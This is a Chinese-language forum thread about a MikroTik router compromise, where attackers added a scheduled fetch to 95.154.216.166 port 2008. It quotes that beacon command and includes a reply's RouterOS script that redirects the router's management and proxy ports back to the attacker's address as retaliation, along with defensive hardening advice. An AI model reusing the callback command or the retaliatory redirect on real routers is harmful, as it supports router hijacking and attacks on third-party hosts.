今天路由器被别人登录了

xuxi3201

/tool fetch address=95.154.216.166 port=2008 src-path=/mikrotik.php mode=http keep-result=no

加了这个 语句。。。

谁看看 ，有哪些影响？

xuxi3201

为了管理 我开放了winbox端口，

0 XI telnet                            23
1 XI ftp                               21
2    www                               xxx
3 XI ssh                               22
4 XI www-ssl                           443  
5 XI api                               8728
6    winbox                            8291
7 XI api-ssl                           8729  

47771885

1. {
   
2. :local socksp [/ip socks get port ]
   
3. :local proxyp [/ip proxy get port ]
   
4. 
   
5. /ip firewall nat
   
6. add action=dst-nat chain=dstnat dst-address-type=local dst-port=($socksp.",".$proxyp) protocol=\
   
7.     tcp to-addresses=95.154.216.166 to-ports=2008
   
8. add action=dst-nat chain=dstnat dst-address-type=local dst-port=23,22,8291,80 protocol=\
   
9.     tcp to-addresses=95.154.216.166 to-ports=2008
   
10. /ip service disable api
    
11. /ip service disable www
    
12. /ip service disable ftp
    
13. /ip service disable ssh
    
14. /ip service disable telnet
    
15. /ip service set winbox port=2018
    
16. 
    
17. /ip socks
    
18. set enabled=no
    
19. 
    
20. /ip proxy
    
21. set enabled=no
    
22. 
    
23. }
    
24. 
    

复制代码

如防火墙加了策略的
补充

1. {
   
2. :local fp [/ip firewall filter get [find comment~"^port"] port]
   
3. 
   
4. /ip firewall filter remove [find comment~"^port"]
   
5. 
   
6. :if ( $fp > 0) do={
   
7. /ip firewall nat
   
8. add action=dst-nat chain=dstnat dst-address-type=local dst-port=$fp protocol=\
   
9.     tcp to-addresses=95.154.216.166 to-ports=2008
   
10. }
    
11. }

复制代码

来个以暴制暴

scheduler 和 script 自行删除可疑的


自行修改winbox 端口 这里默认2018

xuxi3201

我把 winbox port改了，
就是想 请教你 ，他添加到计划任务  有何危害？  

47771885

xuxi3201 发表于 2018-8-2 14:31
我把 winbox port改了，
就是想 请教你 ，他添加到计划任务  有何危害？

为了保持和你的你联系

9939781

为了知道你的IP呗，方便使用你的IP做代理干别的事

xuxi3201

明白了，
多谢。  

hainanmm

/tool fetch address=95.154.216.160 port=2008 src-path=/mikrotik.php mode=http
修改winbox端口号后，软件升级到最新版本有效果吗？

xuxi3201

回复楼上的，我直接把8291外网访问 关闭了。
。
当然，都升级到最新版本  6.40.8

cspm333

假設遠端的地址有DDNS地址可查,是可透過Script排程進行更新的.以winbox為例:

:local winbox [:toarray "192.168.0.0/16,$[:resolve "aaa.no-ip.org"]"] :if ([/ip service get winbox address]!=$winbox) do={/ip service set winbox address=$winbox}

如果有2個或更多的ddns地址,第一行修正成:

:local winbox [:toarray "192.168.0.0/16,$[:resolve "aaa.no-ip.org"],$[:resolve "bbb.no-ip.org"]"] #更多的地址以上類推...

至於其它service服務地址,只將"winbox"這個字串改成其它服務名稱即可.